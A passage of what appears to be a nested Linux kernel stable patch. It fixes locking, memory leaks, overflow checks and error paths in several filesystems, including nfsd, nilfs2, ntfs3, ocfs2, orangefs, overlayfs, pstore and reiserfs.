+ 		since = READ_ONCE(dst->f_wb_err);
+-		status = vfs_fsync_range(dst, copy->cp_dst_pos,
+-					 copy->cp_res.wr_bytes_written, 0);
++		end = copy->cp_dst_pos + copy->cp_res.wr_bytes_written - 1;
++		status = vfs_fsync_range(dst, copy->cp_dst_pos, end, 0);
+ 		if (!status)
+ 			status = filemap_check_wb_err(dst->f_mapping, since);
+ 		if (!status)
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 836bd825ca4ad..52b5552d0d70e 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -675,15 +675,26 @@ find_any_file(struct nfs4_file *f)
+ 	return ret;
+ }
+ 
+-static struct nfsd_file *find_deleg_file(struct nfs4_file *f)
++static struct nfsd_file *find_any_file_locked(struct nfs4_file *f)
+ {
+-	struct nfsd_file *ret = NULL;
++	lockdep_assert_held(&f->fi_lock);
++
++	if (f->fi_fds[O_RDWR])
++		return f->fi_fds[O_RDWR];
++	if (f->fi_fds[O_WRONLY])
++		return f->fi_fds[O_WRONLY];
++	if (f->fi_fds[O_RDONLY])
++		return f->fi_fds[O_RDONLY];
++	return NULL;
++}
++
++static struct nfsd_file *find_deleg_file_locked(struct nfs4_file *f)
++{
++	lockdep_assert_held(&f->fi_lock);
+ 
+-	spin_lock(&f->fi_lock);
+ 	if (f->fi_deleg_file)
+-		ret = nfsd_file_get(f->fi_deleg_file);
+-	spin_unlock(&f->fi_lock);
+-	return ret;
++		return f->fi_deleg_file;
++	return NULL;
+ }
+ 
+ static atomic_long_t num_delegations;
+@@ -2613,9 +2624,11 @@ static int nfs4_show_open(struct seq_file *s, struct nfs4_stid *st)
+ 	ols = openlockstateid(st);
+ 	oo = ols->st_stateowner;
+ 	nf = st->sc_file;
+-	file = find_any_file(nf);
++
++	spin_lock(&nf->fi_lock);
++	file = find_any_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2637,8 +2650,8 @@ static int nfs4_show_open(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_owner(s, oo);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+@@ -2652,9 +2665,10 @@ static int nfs4_show_lock(struct seq_file *s, struct nfs4_stid *st)
+ 	ols = openlockstateid(st);
+ 	oo = ols->st_stateowner;
+ 	nf = st->sc_file;
+-	file = find_any_file(nf);
++	spin_lock(&nf->fi_lock);
++	file = find_any_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2674,8 +2688,8 @@ static int nfs4_show_lock(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_owner(s, oo);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+@@ -2687,9 +2701,10 @@ static int nfs4_show_deleg(struct seq_file *s, struct nfs4_stid *st)
+ 
+ 	ds = delegstateid(st);
+ 	nf = st->sc_file;
+-	file = find_deleg_file(nf);
++	spin_lock(&nf->fi_lock);
++	file = find_deleg_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2705,8 +2720,8 @@ static int nfs4_show_deleg(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_fname(s, file);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index c8b89b4f94e0e..2064e6473d304 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/backing-dev.h>
+ #include <linux/random.h>
++#include <linux/log2.h>
+ #include <linux/crc32.h>
+ #include "nilfs.h"
+ #include "segment.h"
+@@ -192,6 +193,34 @@ static int nilfs_store_log_cursor(struct the_nilfs *nilfs,
+ 	return ret;
+ }
+ 
++/**
++ * nilfs_get_blocksize - get block size from raw superblock data
++ * @sb: super block instance
++ * @sbp: superblock raw data buffer
++ * @blocksize: place to store block size
++ *
++ * nilfs_get_blocksize() calculates the block size from the block size
++ * exponent information written in @sbp and stores it in @blocksize,
++ * or aborts with an error message if it's too large.
++ *
++ * Return Value: On success, 0 is returned. If the block size is too
++ * large, -EINVAL is returned.
++ */
++static int nilfs_get_blocksize(struct super_block *sb,
++			       struct nilfs_super_block *sbp, int *blocksize)
++{
++	unsigned int shift_bits = le32_to_cpu(sbp->s_log_block_size);
++
++	if (unlikely(shift_bits >
++		     ilog2(NILFS_MAX_BLOCK_SIZE) - BLOCK_SIZE_BITS)) {
++		nilfs_err(sb, "too large filesystem blocksize: 2 ^ %u KiB",
++			  shift_bits);
++		return -EINVAL;
++	}
++	*blocksize = BLOCK_SIZE << shift_bits;
++	return 0;
++}
++
+ /**
+  * load_nilfs - load and recover the nilfs
+  * @nilfs: the_nilfs structure to be released
+@@ -245,11 +274,15 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		nilfs->ns_sbwtime = le64_to_cpu(sbp[0]->s_wtime);
+ 
+ 		/* verify consistency between two super blocks */
+-		blocksize = BLOCK_SIZE << le32_to_cpu(sbp[0]->s_log_block_size);
++		err = nilfs_get_blocksize(sb, sbp[0], &blocksize);
++		if (err)
++			goto scan_error;
++
+ 		if (blocksize != nilfs->ns_blocksize) {
+ 			nilfs_warn(sb,
+ 				   "blocksize differs between two super blocks (%d != %d)",
+ 				   blocksize, nilfs->ns_blocksize);
++			err = -EINVAL;
+ 			goto scan_error;
+ 		}
+ 
+@@ -443,11 +476,33 @@ static int nilfs_valid_sb(struct nilfs_super_block *sbp)
+ 	return crc == le32_to_cpu(sbp->s_sum);
+ }
+ 
+-static int nilfs_sb2_bad_offset(struct nilfs_super_block *sbp, u64 offset)
++/**
++ * nilfs_sb2_bad_offset - check the location of the second superblock
++ * @sbp: superblock raw data buffer
++ * @offset: byte offset of second superblock calculated from device size
++ *
++ * nilfs_sb2_bad_offset() checks if the position on the second
++ * superblock is valid or not based on the filesystem parameters
++ * stored in @sbp.  If @offset points to a location within the segment
++ * area, or if the parameters themselves are not normal, it is
++ * determined to be invalid.
++ *
++ * Return Value: true if invalid, false if valid.
++ */
++static bool nilfs_sb2_bad_offset(struct nilfs_super_block *sbp, u64 offset)
+ {
+-	return offset < ((le64_to_cpu(sbp->s_nsegments) *
+-			  le32_to_cpu(sbp->s_blocks_per_segment)) <<
+-			 (le32_to_cpu(sbp->s_log_block_size) + 10));
++	unsigned int shift_bits = le32_to_cpu(sbp->s_log_block_size);
++	u32 blocks_per_segment = le32_to_cpu(sbp->s_blocks_per_segment);
++	u64 nsegments = le64_to_cpu(sbp->s_nsegments);
++	u64 index;
++
++	if (blocks_per_segment < NILFS_SEG_MIN_BLOCKS ||
++	    shift_bits > ilog2(NILFS_MAX_BLOCK_SIZE) - BLOCK_SIZE_BITS)
++		return true;
++
++	index = offset >> (shift_bits + BLOCK_SIZE_BITS);
++	do_div(index, blocks_per_segment);
++	return index < nsegments;
+ }
+ 
+ static void nilfs_release_super_block(struct the_nilfs *nilfs)
+@@ -586,9 +641,11 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	blocksize = BLOCK_SIZE << le32_to_cpu(sbp->s_log_block_size);
+-	if (blocksize < NILFS_MIN_BLOCK_SIZE ||
+-	    blocksize > NILFS_MAX_BLOCK_SIZE) {
++	err = nilfs_get_blocksize(sb, sbp, &blocksize);
++	if (err)
++		goto failed_sbh;
++
++	if (blocksize < NILFS_MIN_BLOCK_SIZE) {
+ 		nilfs_err(sb,
+ 			  "couldn't mount because of unsupported filesystem blocksize %d",
+ 			  blocksize);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index e92bbd754365e..1930640be31a8 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -1424,7 +1424,7 @@ int ntfs_trim_fs(struct ntfs_sb_info *sbi, struct fstrim_range *range)
+ 
+ 	down_read_nested(&wnd->rw_lock, BITMAP_MUTEX_CLUSTERS);
+ 
+-	for (; iw < wnd->nbits; iw++, wbit = 0) {
++	for (; iw < wnd->nwnd; iw++, wbit = 0) {
+ 		CLST lcn_wnd = iw * wbits;
+ 		struct buffer_head *bh;
+ 
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 47012c9bf505e..adc4f73722b7c 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -672,7 +672,7 @@ static u32 true_sectors_per_clst(const struct NTFS_BOOT *boot)
+ 	if (boot->sectors_per_clusters <= 0x80)
+ 		return boot->sectors_per_clusters;
+ 	if (boot->sectors_per_clusters >= 0xf4) /* limit shift to 2MB max */
+-		return 1U << (0 - boot->sectors_per_clusters);
++		return 1U << -(s8)boot->sectors_per_clusters;
+ 	return -EINVAL;
+ }
+ 
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index 7de8718c68a90..ea582b4fe1d9d 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -107,7 +107,7 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 		return -EFBIG;
+ 
+ 	/* Allocate memory for packed Ea. */
+-	ea_p = kmalloc(size + add_bytes, GFP_NOFS);
++	ea_p = kmalloc(size_add(size, add_bytes), GFP_NOFS);
+ 	if (!ea_p)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ocfs2/journal.c b/fs/ocfs2/journal.c
+index 126671e6caeda..3fb98b4569a28 100644
+--- a/fs/ocfs2/journal.c
++++ b/fs/ocfs2/journal.c
+@@ -157,7 +157,7 @@ static void ocfs2_queue_replay_slots(struct ocfs2_super *osb,
+ 	replay_map->rm_state = REPLAY_DONE;
+ }
+ 
+-static void ocfs2_free_replay_slots(struct ocfs2_super *osb)
++void ocfs2_free_replay_slots(struct ocfs2_super *osb)
+ {
+ 	struct ocfs2_replay_map *replay_map = osb->replay_map;
+ 
+diff --git a/fs/ocfs2/journal.h b/fs/ocfs2/journal.h
+index 969d0aa287187..41c382f68529e 100644
+--- a/fs/ocfs2/journal.h
++++ b/fs/ocfs2/journal.h
+@@ -150,6 +150,7 @@ int ocfs2_recovery_init(struct ocfs2_super *osb);
+ void ocfs2_recovery_exit(struct ocfs2_super *osb);
+ 
+ int ocfs2_compute_replay_slots(struct ocfs2_super *osb);
++void ocfs2_free_replay_slots(struct ocfs2_super *osb);
+ /*
+  *  Journal Control:
+  *  Initialize, Load, Shutdown, Wipe a journal.
+diff --git a/fs/ocfs2/stackglue.c b/fs/ocfs2/stackglue.c
+index 317126261523b..a8d5ca98fa57c 100644
+--- a/fs/ocfs2/stackglue.c
++++ b/fs/ocfs2/stackglue.c
+@@ -669,6 +669,8 @@ static struct ctl_table_header *ocfs2_table_header;
+ 
+ static int __init ocfs2_stack_glue_init(void)
+ {
++	int ret;
++
+ 	strcpy(cluster_stack_name, OCFS2_STACK_PLUGIN_O2CB);
+ 
+ 	ocfs2_table_header = register_sysctl("fs/ocfs2/nm", ocfs2_nm_table);
+@@ -678,7 +680,11 @@ static int __init ocfs2_stack_glue_init(void)
+ 		return -ENOMEM; /* or something. */
+ 	}
+ 
+-	return ocfs2_sysfs_init();
++	ret = ocfs2_sysfs_init();
++	if (ret)
++		unregister_sysctl_table(ocfs2_table_header);
++
++	return ret;
+ }
+ 
+ static void __exit ocfs2_stack_glue_exit(void)
+diff --git a/fs/ocfs2/super.c b/fs/ocfs2/super.c
+index 42c993e53924f..0b0e6a1321018 100644
+--- a/fs/ocfs2/super.c
++++ b/fs/ocfs2/super.c
+@@ -1159,6 +1159,7 @@ static int ocfs2_fill_super(struct super_block *sb, void *data, int silent)
+ out_dismount:
+ 	atomic_set(&osb->vol_state, VOLUME_DISABLED);
+ 	wake_up(&osb->osb_mount_event);
++	ocfs2_free_replay_slots(osb);
+ 	ocfs2_dismount_volume(sb, 1);
+ 	goto out;
+ 
+@@ -1822,12 +1823,14 @@ static int ocfs2_mount_volume(struct super_block *sb)
+ 	status = ocfs2_truncate_log_init(osb);
+ 	if (status < 0) {
+ 		mlog_errno(status);
+-		goto out_system_inodes;
++		goto out_check_volume;
+ 	}
+ 
+ 	ocfs2_super_unlock(osb, 1);
+ 	return 0;
+ 
++out_check_volume:
++	ocfs2_free_replay_slots(osb);
+ out_system_inodes:
+ 	if (osb->local_alloc_state == OCFS2_LA_ENABLED)
+ 		ocfs2_shutdown_local_alloc(osb);
+diff --git a/fs/orangefs/orangefs-debugfs.c b/fs/orangefs/orangefs-debugfs.c
+index 29eaa45443727..1b508f5433846 100644
+--- a/fs/orangefs/orangefs-debugfs.c
++++ b/fs/orangefs/orangefs-debugfs.c
+@@ -194,15 +194,10 @@ void orangefs_debugfs_init(int debug_mask)
+  */
+ static void orangefs_kernel_debug_init(void)
+ {
+-	int rc = -ENOMEM;
+-	char *k_buffer = NULL;
++	static char k_buffer[ORANGEFS_MAX_DEBUG_STRING_LEN] = { };
+ 
+ 	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: start\n", __func__);
+ 
+-	k_buffer = kzalloc(ORANGEFS_MAX_DEBUG_STRING_LEN, GFP_KERNEL);
+-	if (!k_buffer)
+-		goto out;
+-
+ 	if (strlen(kernel_debug_string) + 1 < ORANGEFS_MAX_DEBUG_STRING_LEN) {
+ 		strcpy(k_buffer, kernel_debug_string);
+ 		strcat(k_buffer, "\n");
+@@ -213,15 +208,14 @@ static void orangefs_kernel_debug_init(void)
+ 
+ 	debugfs_create_file(ORANGEFS_KMOD_DEBUG_FILE, 0444, debug_dir, k_buffer,
+ 			    &kernel_debug_fops);
+-
+-out:
+-	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: rc:%d:\n", __func__, rc);
+ }
+ 
+ 
+ void orangefs_debugfs_cleanup(void)
+ {
+ 	debugfs_remove_recursive(debug_dir);
++	kfree(debug_help_string);
++	debug_help_string = NULL;
+ }
+ 
+ /* open ORANGEFS_KMOD_DEBUG_HELP_FILE */
+@@ -297,18 +291,13 @@ static int help_show(struct seq_file *m, void *v)
+ /*
+  * initialize the client-debug file.
+  */
+-static int orangefs_client_debug_init(void)
++static void orangefs_client_debug_init(void)
+ {
+ 
+-	int rc = -ENOMEM;
+-	char *c_buffer = NULL;
++	static char c_buffer[ORANGEFS_MAX_DEBUG_STRING_LEN] = { };
+ 
+ 	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: start\n", __func__);
+ 
+-	c_buffer = kzalloc(ORANGEFS_MAX_DEBUG_STRING_LEN, GFP_KERNEL);
+-	if (!c_buffer)
+-		goto out;
+-
+ 	if (strlen(client_debug_string) + 1 < ORANGEFS_MAX_DEBUG_STRING_LEN) {
+ 		strcpy(c_buffer, client_debug_string);
+ 		strcat(c_buffer, "\n");
+@@ -322,13 +311,6 @@ static int orangefs_client_debug_init(void)
+ 						  debug_dir,
+ 						  c_buffer,
+ 						  &kernel_debug_fops);
+-
+-	rc = 0;
+-
+-out:
+-
+-	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: rc:%d:\n", __func__, rc);
+-	return rc;
+ }
+ 
+ /* open ORANGEFS_KMOD_DEBUG_FILE or ORANGEFS_CLIENT_DEBUG_FILE.*/
+@@ -671,6 +653,7 @@ int orangefs_prepare_debugfs_help_string(int at_boot)
+ 		memset(debug_help_string, 0, DEBUG_HELP_STRING_SIZE);
+ 		strlcat(debug_help_string, new, string_size);
+ 		mutex_unlock(&orangefs_help_file_lock);
++		kfree(new);
+ 	}
+ 
+ 	rc = 0;
+diff --git a/fs/orangefs/orangefs-mod.c b/fs/orangefs/orangefs-mod.c
+index cd7297815f91e..5ab741c60b7e2 100644
+--- a/fs/orangefs/orangefs-mod.c
++++ b/fs/orangefs/orangefs-mod.c
+@@ -141,7 +141,7 @@ static int __init orangefs_init(void)
+ 		gossip_err("%s: could not initialize device subsystem %d!\n",
+ 			   __func__,
+ 			   ret);
+-		goto cleanup_device;
++		goto cleanup_sysfs;
+ 	}
+ 
+ 	ret = register_filesystem(&orangefs_fs_type);
+@@ -152,11 +152,11 @@ static int __init orangefs_init(void)
+ 		goto out;
+ 	}
+ 
+-	orangefs_sysfs_exit();
+-
+-cleanup_device:
+ 	orangefs_dev_cleanup();
+ 
++cleanup_sysfs:
++	orangefs_sysfs_exit();
++
+ sysfs_init_failed:
+ 	orangefs_debugfs_cleanup();
+ 
+diff --git a/fs/orangefs/orangefs-sysfs.c b/fs/orangefs/orangefs-sysfs.c
+index de80b62553bb1..be4ba03a01a0f 100644
+--- a/fs/orangefs/orangefs-sysfs.c
++++ b/fs/orangefs/orangefs-sysfs.c
+@@ -896,9 +896,18 @@ static struct attribute *orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(orangefs_default);
+ 
++static struct kobject *orangefs_obj;
++
++static void orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(orangefs_obj);
++	orangefs_obj = NULL;
++}
++
+ static struct kobj_type orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = orangefs_default_groups,
++	.release = orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute acache_hard_limit_attribute =
+@@ -934,9 +943,18 @@ static struct attribute *acache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(acache_orangefs_default);
+ 
++static struct kobject *acache_orangefs_obj;
++
++static void acache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(acache_orangefs_obj);
++	acache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type acache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = acache_orangefs_default_groups,
++	.release = acache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute capcache_hard_limit_attribute =
+@@ -972,9 +990,18 @@ static struct attribute *capcache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(capcache_orangefs_default);
+ 
++static struct kobject *capcache_orangefs_obj;
++
++static void capcache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(capcache_orangefs_obj);
++	capcache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type capcache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = capcache_orangefs_default_groups,
++	.release = capcache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute ccache_hard_limit_attribute =
+@@ -1010,9 +1037,18 @@ static struct attribute *ccache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(ccache_orangefs_default);
+ 
++static struct kobject *ccache_orangefs_obj;
++
++static void ccache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(ccache_orangefs_obj);
++	ccache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type ccache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = ccache_orangefs_default_groups,
++	.release = ccache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute ncache_hard_limit_attribute =
+@@ -1048,9 +1084,18 @@ static struct attribute *ncache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(ncache_orangefs_default);
+ 
++static struct kobject *ncache_orangefs_obj;
++
++static void ncache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(ncache_orangefs_obj);
++	ncache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type ncache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = ncache_orangefs_default_groups,
++	.release = ncache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute pc_acache_attribute =
+@@ -1079,9 +1124,18 @@ static struct attribute *pc_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(pc_orangefs_default);
+ 
++static struct kobject *pc_orangefs_obj;
++
++static void pc_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(pc_orangefs_obj);
++	pc_orangefs_obj = NULL;
++}
++
+ static struct kobj_type pc_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = pc_orangefs_default_groups,
++	.release = pc_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute stats_reads_attribute =
+@@ -1103,19 +1157,20 @@ static struct attribute *stats_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(stats_orangefs_default);
+ 
++static struct kobject *stats_orangefs_obj;
++
++static void stats_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(stats_orangefs_obj);
++	stats_orangefs_obj = NULL;
++}
++
+ static struct kobj_type stats_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = stats_orangefs_default_groups,
++	.release = stats_orangefs_obj_release,
+ };
+ 
+-static struct kobject *orangefs_obj;
+-static struct kobject *acache_orangefs_obj;
+-static struct kobject *capcache_orangefs_obj;
+-static struct kobject *ccache_orangefs_obj;
+-static struct kobject *ncache_orangefs_obj;
+-static struct kobject *pc_orangefs_obj;
+-static struct kobject *stats_orangefs_obj;
+-
+ int orangefs_sysfs_init(void)
+ {
+ 	int rc = -EINVAL;
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index a1a22f58ba183..d066be3b9226e 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -517,9 +517,16 @@ static long ovl_fallocate(struct file *file, int mode, loff_t offset, loff_t len
+ 	const struct cred *old_cred;
+ 	int ret;
+ 
++	inode_lock(inode);
++	/* Update mode */
++	ovl_copyattr(inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
+ 	ret = ovl_real_fdget(file, &real);
+ 	if (ret)
+-		return ret;
++		goto out_unlock;
+ 
+ 	old_cred = ovl_override_creds(file_inode(file)->i_sb);
+ 	ret = vfs_fallocate(real.file, mode, offset, len);
+@@ -530,6 +537,9 @@ static long ovl_fallocate(struct file *file, int mode, loff_t offset, loff_t len
+ 
+ 	fdput(real);
+ 
++out_unlock:
++	inode_unlock(inode);
++
+ 	return ret;
+ }
+ 
+@@ -567,14 +577,23 @@ static loff_t ovl_copyfile(struct file *file_in, loff_t pos_in,
+ 	const struct cred *old_cred;
+ 	loff_t ret;
+ 
++	inode_lock(inode_out);
++	if (op != OVL_DEDUPE) {
++		/* Update mode */
++		ovl_copyattr(inode_out);
++		ret = file_remove_privs(file_out);
++		if (ret)
++			goto out_unlock;
++	}
++
+ 	ret = ovl_real_fdget(file_out, &real_out);
+ 	if (ret)
+-		return ret;
++		goto out_unlock;
+ 
+ 	ret = ovl_real_fdget(file_in, &real_in);
+ 	if (ret) {
+ 		fdput(real_out);
+-		return ret;
++		goto out_unlock;
+ 	}
+ 
+ 	old_cred = ovl_override_creds(file_inode(file_out)->i_sb);
+@@ -603,6 +622,9 @@ static loff_t ovl_copyfile(struct file *file_in, loff_t pos_in,
+ 	fdput(real_in);
+ 	fdput(real_out);
+ 
++out_unlock:
++	inode_unlock(inode_out);
++
+ 	return ret;
+ }
+ 
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index a29a8afe9b262..3d14a3f1465d1 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -139,11 +139,16 @@ static int ovl_dentry_revalidate_common(struct dentry *dentry,
+ 					unsigned int flags, bool weak)
+ {
+ 	struct ovl_entry *oe = dentry->d_fsdata;
++	struct inode *inode = d_inode_rcu(dentry);
+ 	struct dentry *upper;
+ 	unsigned int i;
+ 	int ret = 1;
+ 
+-	upper = ovl_dentry_upper(dentry);
++	/* Careful in RCU mode */
++	if (!inode)
++		return -ECHILD;
++
++	upper = ovl_i_dentry_upper(inode);
+ 	if (upper)
+ 		ret = ovl_revalidate_real(upper, flags, weak);
+ 
+diff --git a/fs/pstore/Kconfig b/fs/pstore/Kconfig
+index 8adabde685f13..c49d554cc9ae9 100644
+--- a/fs/pstore/Kconfig
++++ b/fs/pstore/Kconfig
+@@ -126,6 +126,7 @@ config PSTORE_CONSOLE
+ config PSTORE_PMSG
+ 	bool "Log user space messages"
+ 	depends on PSTORE
++	select RT_MUTEXES
+ 	help
+ 	  When the option is enabled, pstore will export a character
+ 	  interface /dev/pmsg0 to log user space messages. On reboot
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index d8542ec2f38c6..18cf94b597e05 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,9 +7,10 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
++#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_MUTEX(pmsg_lock);
++static DEFINE_RT_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -28,9 +29,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	mutex_lock(&pmsg_lock);
++	rt_mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	mutex_unlock(&pmsg_lock);
++	rt_mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index fefe3d391d3af..74e4d93f3e08d 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -735,6 +735,7 @@ static int ramoops_probe(struct platform_device *pdev)
+ 	/* Make sure we didn't get bogus platform data pointer. */
+ 	if (!pdata) {
+ 		pr_err("NULL platform data\n");
++		err = -EINVAL;
+ 		goto fail_out;
+ 	}
+ 
+@@ -742,6 +743,7 @@ static int ramoops_probe(struct platform_device *pdev)
+ 			!pdata->ftrace_size && !pdata->pmsg_size)) {
+ 		pr_err("The memory size and the record/console size must be "
+ 			"non-zero\n");
++		err = -EINVAL;
+ 		goto fail_out;
+ 	}
+ 
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index a89e33719fcf2..8bf09886e7e66 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -439,7 +439,11 @@ static void *persistent_ram_vmap(phys_addr_t start, size_t size,
+ 		phys_addr_t addr = page_start + i * PAGE_SIZE;
+ 		pages[i] = pfn_to_page(addr >> PAGE_SHIFT);
+ 	}
+-	vaddr = vmap(pages, page_count, VM_MAP, prot);
++	/*
++	 * VM_IOREMAP used here to bypass this region during vread()
++	 * and kmap_atomic() (i.e. kcore) to avoid __va() failures.
++	 */
++	vaddr = vmap(pages, page_count, VM_MAP | VM_IOREMAP, prot);
+ 	kfree(pages);
+ 
+ 	/*
+diff --git a/fs/reiserfs/namei.c b/fs/reiserfs/namei.c
+index 3d7a35d6a18bc..b916859992ec8 100644
+--- a/fs/reiserfs/namei.c
++++ b/fs/reiserfs/namei.c
+@@ -696,6 +696,7 @@ static int reiserfs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -779,6 +780,7 @@ static int reiserfs_mknod(struct user_namespace *mnt_userns, struct inode *dir,
+ 
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -878,6 +880,7 @@ static int reiserfs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	retval = journal_end(&th);
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -1194,6 +1197,7 @@ static int reiserfs_symlink(struct user_namespace *mnt_userns,
+ 	retval = journal_end(&th);
+ out_failed:
+ 	reiserfs_write_unlock(parent_dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+diff --git a/fs/reiserfs/xattr_security.c b/fs/reiserfs/xattr_security.c
+index 8965c8e5e172b..857a65b057264 100644
+--- a/fs/reiserfs/xattr_security.c
++++ b/fs/reiserfs/xattr_security.c
+@@ -50,6 +50,7 @@ int reiserfs_security_init(struct inode *dir, struct inode *inode,
+ 	int error;
+ 
+ 	sec->name = NULL;
++	sec->value = NULL;
+ 
+ 	/* Don't add selinux attributes on xattrs - they'll never get used */
+ 	if (IS_PRIVATE(dir))
+@@ -95,7 +96,6 @@ int reiserfs_security_write(struct reiserfs_transaction_handle *th,
+ 
+ void reiserfs_security_free(struct reiserfs_security_handle *sec)
+ {
+-	kfree(sec->name);
+ 	kfree(sec->value);
+ 	sec->name = NULL;
+ 	sec->value = NULL;
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index d4ec9bb97de95..3b8567564e7e4 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
